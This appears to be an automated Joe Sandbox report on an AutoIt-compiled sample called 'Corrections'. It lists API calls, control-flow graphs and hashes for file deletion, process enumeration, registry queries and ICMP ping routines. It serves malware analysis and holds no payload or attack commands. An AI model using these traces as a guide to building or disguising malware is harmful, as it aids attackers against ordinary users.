                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                            • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                            • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                            • Opcode ID: 11a1985ffa701bb15be895ffd41664c38282d3530244a00edd5103b15ebfda43
                                                                                                                                                                                                                                                                                            • Instruction ID: df13bdfa31e120429eccba509bb3bd6b526c97d3b9b6ed2cbf93d78d4d0ae9f6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11a1985ffa701bb15be895ffd41664c38282d3530244a00edd5103b15ebfda43
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4251247110C355AAC716FF70AC41FBE7BE8AFD0754F00492CF582521B6DB688A49E762

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00925851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009255D1,?,?,00964B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00925871
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098EAB0: GetFileAttributesW.KERNEL32(?,0098D840), ref: 0098EAB1
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0098DCCB
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0098DD1B
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0098DD2C
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0098DD43
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0098DD4C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                            • Opcode ID: ae3ee49f52ef196e9892fe0ab718b079020bba99cb4717245b58c8bb97940a81
                                                                                                                                                                                                                                                                                            • Instruction ID: 493eca2b982467bfc9c390bed4f7b2b71bead3b2dc854ed5723785684240ec37
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae3ee49f52ef196e9892fe0ab718b079020bba99cb4717245b58c8bb97940a81
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F316B31009395ABC301FB60D9819EFB7ECAE95314F404E1DF4E5922D1EB20DA09DBA2

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1574 98dd87-98ddcf CreateToolhelp32Snapshot Process32FirstW call 98e80e 1577 98de7d-98de80 1574->1577 1578 98ddd4-98dde3 Process32NextW 1577->1578 1579 98de86-98de95 CloseHandle 1577->1579 1578->1579 1580 98dde9-98de58 call 92bf73 * 2 call 92b329 call 92568e call 92bd98 call 927bb5 call 93e36b 1578->1580 1595 98de5a-98de5c 1580->1595 1596 98de62-98de69 1580->1596 1597 98de6b-98de78 call 92bd98 * 2 1595->1597 1598 98de5e-98de60 1595->1598 1596->1597 1597->1577 1598->1596 1598->1597
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0098DDAC
                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0098DDBA
                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0098DDDA
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0098DE87
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 25d9e7518be6ee835ea48cbf0f7270b40119449b349ab269122e92e8839c3d2b
                                                                                                                                                                                                                                                                                            • Instruction ID: 4c4662dd3fd19f039bd6b1ed7e7b475f5e0fbccc4385b033e07b53aef4f62881
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25d9e7518be6ee835ea48cbf0f7270b40119449b349ab269122e92e8839c3d2b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D73184711083019FD314EF54DC85BAFBBE8AFD9354F04092DF585872A2EB71A949CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 0092EF07
                                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 0092F107
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092F228
                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 0092F27B
                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 0092F289
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092F29F
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0092F2B1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bb27342123d7f7421cfd21fdb5ce3ceca82e45725932d7ede376f90eb94d6cdb
                                                                                                                                                                                                                                                                                            • Instruction ID: 88dcae5b276e955666096868ae3d51afda46120eb58d421e9a3bf4855e036d25
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb27342123d7f7421cfd21fdb5ce3ceca82e45725932d7ede376f90eb94d6cdb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E320371608212DFD728CF24D894FAAB7F8BF81304F14893DE569872A6D775E844DB82

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00923657
                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00923681
                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00923692
                                                                                                                                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 009236AF
                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009236BF
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 009236D5
                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009236E4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                            • Opcode ID: 48b73e8156be6be0c4a46b45360787797c36c1c99528c9e7b2eb93cc8fb8c966
                                                                                                                                                                                                                                                                                            • Instruction ID: 9b3d040062a20939fba74d15591b3ccead9f4f6f6676361406bdbac821152eb2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48b73e8156be6be0c4a46b45360787797c36c1c99528c9e7b2eb93cc8fb8c966
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C821EAB1D2A319AFDB00DF94E989BDD7BB4FB09710F10411AF511A72A0E7B54540DF50

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 366 9609db-960a0b call 9607af 369 960a26-960a32 call 955594 366->369 370 960a0d-960a18 call 94f636 366->370 376 960a34-960a49 call 94f636 call 94f649 369->376 377 960a4b-960a94 call 96071a 369->377 375 960a1a-960a21 call 94f649 370->375 386 960cfd-960d03 375->386 376->375 384 960a96-960a9f 377->384 385 960b01-960b0a GetFileType 377->385 388 960ad6-960afc GetLastError call 94f613 384->388 389 960aa1-960aa5 384->389 390 960b53-960b56 385->390 391 960b0c-960b3d GetLastError call 94f613 CloseHandle 385->391 388->375 389->388 395 960aa7-960ad4 call 96071a 389->395 393 960b5f-960b65 390->393 394 960b58-960b5d 390->394 391->375 405 960b43-960b4e call 94f649 391->405 398 960b69-960bb7 call 9554dd 393->398 399 960b67 393->399 394->398 395->385 395->388 408 960bc7-960beb call 9604cd 398->408 409 960bb9-960bc5 call 96092b 398->409 399->398 405->375 416 960bfe-960c41 408->416 417 960bed 408->417 409->408 415 960bef-960bf9 call 958a2e 409->415 415->386 418 960c62-960c70 416->418 419 960c43-960c47 416->419 417->415 423 960c76-960c7a 418->423 424 960cfb 418->424 419->418 422 960c49-960c5d 419->422 422->418 423->424 425 960c7c-960caf CloseHandle call 96071a 423->425 424->386 428 960ce3-960cf7 425->428 429 960cb1-960cdd GetLastError call 94f613 call 9556a6 425->429 428->424 429->428
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0096071A: CreateFileW.KERNEL32(00000000,00000000,?,00960A84,?,?,00000000,?,00960A84,00000000,0000000C), ref: 00960737
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00960AEF
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00960AF6
                                                                                                                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00960B02
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00960B0C
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00960B15
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00960B35
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00960C7F
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00960CB1
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00960CB8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                            • Opcode ID: cdb886edcd44b4b8b97803b0c11fe5d0f3fdd15824b23b6652addaae6a01a920
                                                                                                                                                                                                                                                                                            • Instruction ID: 2d5893a7e2d32664f402512a847e7b0a37ccf086701b2ff258a2e7142ba64e9e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdb886edcd44b4b8b97803b0c11fe5d0f3fdd15824b23b6652addaae6a01a920
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24A14632A241098FCF19EF78D892BAE3BA5EB8A324F140159F811DB3D2D7359C12CB51

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00925594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00964B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 009255B2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00925238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0092525A
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009253C4
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00964BFD
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00964C3E
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00964C80
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00964CE7
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00964CF6
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                            • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                            • Opcode ID: ca8106e25e82e43b5ec9cb998006b9262427329abed469bb68892de2509cbd83
                                                                                                                                                                                                                                                                                            • Instruction ID: 0b6673e4d1dd1fce157e4712b5b909e4d88f18eef74edc6f9baac1925f3e22b9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca8106e25e82e43b5ec9cb998006b9262427329abed469bb68892de2509cbd83
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0771B1715193119FC314EF65EC81AABBBE8FF88350F80842EF145831B0EBB59A48DB91

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 009234DE
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 009234ED
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00923503
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A4), ref: 00923515
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A2), ref: 00923527
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0092353F
                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(?), ref: 00923590
                                                                                                                                                                                                                                                                                              • Part of subcall function 00923624: GetSysColorBrush.USER32(0000000F), ref: 00923657
                                                                                                                                                                                                                                                                                              • Part of subcall function 00923624: RegisterClassExW.USER32(00000030), ref: 00923681
                                                                                                                                                                                                                                                                                              • Part of subcall function 00923624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00923692
                                                                                                                                                                                                                                                                                              • Part of subcall function 00923624: InitCommonControlsEx.COMCTL32(?), ref: 009236AF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00923624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009236BF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00923624: LoadIconW.USER32(000000A9), ref: 009236D5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00923624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009236E4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                            • Opcode ID: 41659295a73829983c2c815e1b48ff072e7fbfd703ba7c6eb9b230af50a8d47f
                                                                                                                                                                                                                                                                                            • Instruction ID: 61aca8bea14ff380996e79c9f0fa3a189799bc4660955e0cdb2af27f737f0f5d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41659295a73829983c2c815e1b48ff072e7fbfd703ba7c6eb9b230af50a8d47f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C62150B0D25315ABDB109FA5ED85BA97FF4FB08B50F00401AF604A62A0D7F94549EF90

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 507 9a0fb8-9a0fef call 92e6a0 510 9a100f-9a1021 WSAStartup 507->510 511 9a0ff1-9a0ffe call 92c98d 507->511 512 9a1023-9a1031 510->512 513 9a1054-9a1091 call 93c1f6 call 928ec0 call 93f9d4 inet_addr gethostbyname 510->513 511->510 522 9a1000-9a100b call 92c98d 511->522 515 9a1033 512->515 516 9a1036-9a1046 512->516 530 9a10a2-9a10b0 513->530 531 9a1093-9a10a0 IcmpCreateFile 513->531 515->516 519 9a104b-9a104f 516->519 520 9a1048 516->520 523 9a1249-9a1251 519->523 520->519 522->510 533 9a10b2 530->533 534 9a10b5-9a10c5 530->534 531->530 532 9a10d3-9a1100 call 94017b call 92423c 531->532 543 9a112b-9a1148 IcmpSendEcho 532->543 544 9a1102-9a1129 IcmpSendEcho 532->544 533->534 535 9a10ca-9a10ce 534->535 536 9a10c7 534->536 538 9a1240-9a1244 call 92bd98 535->538 536->535 538->523 545 9a114c-9a114e 543->545 544->545 546 9a11ae-9a11bc 545->546 547 9a1150-9a1155 545->547 548 9a11be 546->548 549 9a11c1-9a11c8 546->549 550 9a115b-9a1160 547->550 551 9a11f8-9a120a call 92e6a0 547->551 548->549 553 9a11e4-9a11ed 549->553 554 9a11ca-9a11d8 550->554 555 9a1162-9a1167 550->555 562 9a120c-9a120e 551->562 563 9a1210 551->563 559 9a11ef 553->559 560 9a11f2-9a11f6 553->560 557 9a11da 554->557 558 9a11dd 554->558 555->546 561 9a1169-9a116e 555->561 557->558 558->553 559->560 564 9a1212-9a1229 IcmpCloseHandle WSACleanup 560->564 565 9a1193-9a11a1 561->565 566 9a1170-9a1175 561->566 562->564 563->564 564->538 570 9a122b-9a123d call 94013d call 940184 564->570 568 9a11a3 565->568 569 9a11a6-9a11ac 565->569 566->554 567 9a1177-9a1185 566->567 571 9a118a-9a1191 567->571 572 9a1187 567->572 568->569 569->553 570->538 571->553 572->571
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 009A1019
                                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?), ref: 009A1079
                                                                                                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 009A1085
                                                                                                                                                                                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 009A1093
                                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009A1123
                                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009A1142
                                                                                                                                                                                                                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 009A1216
                                                                                                                                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 009A121C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                            • String ID: Ping
                                                                                                                                                                                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                            • Opcode ID: 858238306049b6cbb2304f846b78f360b9ca827401d38b5efe649831447a2775
                                                                                                                                                                                                                                                                                            • Instruction ID: 0c6b3e937cb25ae7693ca49fa6594175140f6dd726c86d64234021373c21a452
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 858238306049b6cbb2304f846b78f360b9ca827401d38b5efe649831447a2775
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1591AF716082419FD720DF19C888F16BBE4EF89318F1489A9F5698B7A2C735ED85CBC1

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
